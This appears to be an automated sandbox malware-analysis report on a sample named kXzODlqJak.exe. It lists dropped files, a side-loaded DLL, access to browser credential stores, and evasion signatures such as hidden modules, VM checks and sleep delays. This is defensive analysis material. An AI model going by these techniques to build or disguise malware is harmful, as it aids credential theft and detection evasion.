Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local Statez source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2311847799.000000000050C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2311847799.000000000050C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State> source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2803897561.000000000428C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "winload_prod.pdbk source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2538008973.00000000004FF000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2311847799.000000000050C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: RescueCDBurner.exe, 00000003.00000002.1527099049.000000006CFB1000.00000020.00000001.01000000.00000008.sdmp, RescueCDBurner.exe, 00000004.00000002.1590096177.000000006BE01000.00000020.00000001.01000000.00000011.sdmp
Source: kXzODlqJak.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: kXzODlqJak.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: kXzODlqJak.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: kXzODlqJak.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: kXzODlqJak.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0B530E LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_6D0B530E
Source: QtCore4.dll.2.drStatic PE information: real checksum: 0x283beb should be: 0x284aa4
Source: Ascidian.dll.2.drStatic PE information: real checksum: 0x77117 should be: 0x7ccd7
Source: QtCore4.dll.3.drStatic PE information: real checksum: 0x283beb should be: 0x284aa4
Source: pfce.5.drStatic PE information: real checksum: 0x26dceb should be: 0x26a793
Source: morvrstbj.11.drStatic PE information: real checksum: 0x26dceb should be: 0x26a793
Source: StarBurn.dll.2.drStatic PE information: real checksum: 0xa4afa should be: 0xab76c
Source: StarBurn.dll.3.drStatic PE information: real checksum: 0xa4afa should be: 0xab76c
Source: kXzODlqJak.exeStatic PE information: section name: .didat
Source: kXzODlqJak.exeStatic PE information: section name: .wixburn
Source: kXzODlqJak.exe.0.drStatic PE information: section name: .didat
Source: kXzODlqJak.exe.0.drStatic PE information: section name: .wixburn
Source: LocalCtrl_alpha_v3.exe.5.drStatic PE information: section name: Shared
Source: pfce.5.drStatic PE information: section name: .xdata
Source: pfce.5.drStatic PE information: section name: sfdel
Source: morvrstbj.11.drStatic PE information: section name: .xdata
Source: morvrstbj.11.drStatic PE information: section name: sfdel
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0094CAD3 push ecx; ret 0_2_0094CAE6
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F8CAD3 push ecx; ret 2_2_00F8CAE6
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D074910 push ebp; retf 2_2_6D07491B
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0A8405 push ecx; ret 2_2_6D0A8418
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0A47B4 push ecx; ret 2_2_6D0A47C7
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0D0CC5 push ecx; ret 3_2_6C0D0CD8
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0DB658 push ecx; ret 3_2_6C0DB66B
Source: msvcr100.dll.2.drStatic PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.2.drStatic PE information: section name: .text entropy: 6.9340411158815725
Source: msvcr100.dll.3.drStatic PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.3.drStatic PE information: section name: .text entropy: 6.9340411158815725
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtGui4.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtNetwork4.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\pfceJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtXml4.dllJump to dropped file
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeJump to dropped file
Source: C:\Users\user\Desktop\kXzODlqJak.exeFile created: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeJump to dropped file
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtGui4.dllJump to dropped file
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtNetwork4.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\Ascidian.dllJump to dropped file
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtXml4.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtCore4.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\StarBurn.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\msvcp100.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\msvcr100.dllJump to dropped file
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtCore4.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\morvrstbjJump to dropped file
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcp100.dllJump to dropped file
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcr100.dllJump to dropped file
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\StarBurn.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtGui4.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtNetwork4.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtXml4.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeJump to dropped file
Source: C:\Users\user\Desktop\kXzODlqJak.exeFile created: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\Ascidian.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtCore4.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\StarBurn.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\msvcp100.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\msvcr100.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\pfceJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\morvrstbjJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Found hidden mapped module (file has been removed from disk)
Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PFCE
Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\MORVRSTBJ
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C11A3DD GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,3_2_6C11A3DD
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Switches to a custom stack to bypass stack traces
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6BF47C44
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6BF47C44
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6BF47945
Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6BF43B54
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6BD37C44
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6BD37945
Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6BD33B54
Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pfceJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeDropped PE file which has not been started: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\Ascidian.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\morvrstbjJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeEvasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Users\user\Desktop\kXzODlqJak.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-48700
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\kXzODlqJak.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-49882
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeAPI coverage: 5.9 %
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe TID: 2212Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 6320Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 6320Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 7952Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 7952Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0093A805 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 0093A8A0h0_2_0093A805
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0093A805 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 0093A899h0_2_0093A805
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F7A805 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 00F7A8A0h2_2_00F7A805
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F7A805 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 00F7A899h2_2_00F7A805
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008E5C81 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_008E5C81
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_00931290 FindFirstFileExW,0_2_00931290
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0094343B FindFirstFileW,FindClose,0_2_0094343B
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008FE72A FindFirstFileW,FindNextFileW,FindClose,0_2_008FE72A
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F71290 FindFirstFileExW,2_2_00F71290
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F8343B FindFirstFileW,FindClose,2_2_00F8343B
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F3E72A FindFirstFileW,FindNextFileW,FindClose,2_2_00F3E72A
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F25C81 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,2_2_00F25C81
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0A0D44 _wcsncpy,_wcsncat,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,wsprintfW,FindNextFileW,FindClose,2_2_6D0A0D44
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0A0534 _memset,FindFirstFileW,FindClose,2_2_6D0A0534
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D07B005 _wcsncpy,_wcsncat,wsprintfW,wsprintfW,FindFirstFileW,GetTickCount,GetTickCount,GetTickCount,wsprintfW,GetTickCount,wsprintfW,FindNextFileW,FindClose,2_2_6D07B005
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0772FA __EH_prolog3_GS,GetACP,GetACP,GetACP,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,2_2_6D0772FA
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C11CC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,3_2_6C11CC23
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C11C8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,3_2_6C11C8FD
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0E81A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6C0E81A1
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0094C535 VirtualQuery,GetSystemInfo,0_2_0094C535
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: VMware
Source: cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
Source: cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
Source: RescueCDBurner.exe, 00000003.00000003.1503561199.000000000AC39000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: [ed'ee.?AVQEmulationPaintEngine@@0/
Source: RescueCDBurner.exe, 00000004.00000002.1588921227.000000006BAEF000.00000008.00000001.01000000.00000013.sdmpBinary or memory string: k.?AVQEmulationPaintEngine@@0/Ek
Source: cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2614840586.0000000000663000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2223556230.0000000000663000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
Source: RescueCDBurner.exe, 00000003.00000002.1526661627.000000006CC9F000.00000008.00000001.01000000.0000000B.sdmpBinary or memory string: l.?AVQEmulationPaintEngine@@0/`l
Source: cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2614840586.0000000000663000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2223556230.0000000000663000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
Source: cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
Source: RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: <&version=&md5=&newsize=&registercode=&registertime=&langStr=&fname=&lname=&email=&activecode=action=wbrb\\.\PhysicalDrive0VMwareb71710ea1f7bf1b2
Source: RescueCDBurner.exe, 00000003.00000003.1503561199.000000000AC39000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1526661627.000000006CC9F000.00000008.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000004.00000002.1588921227.000000006BAEF000.00000008.00000001.01000000.00000013.sdmpBinary or memory string: .?AVQEmulationPaintEngine@@
Source: C:\Users\user\Desktop\kXzODlqJak.exeAPI call chain: ExitProcess graph end nodegraph_0-48919
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0092D3EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0092D3EE
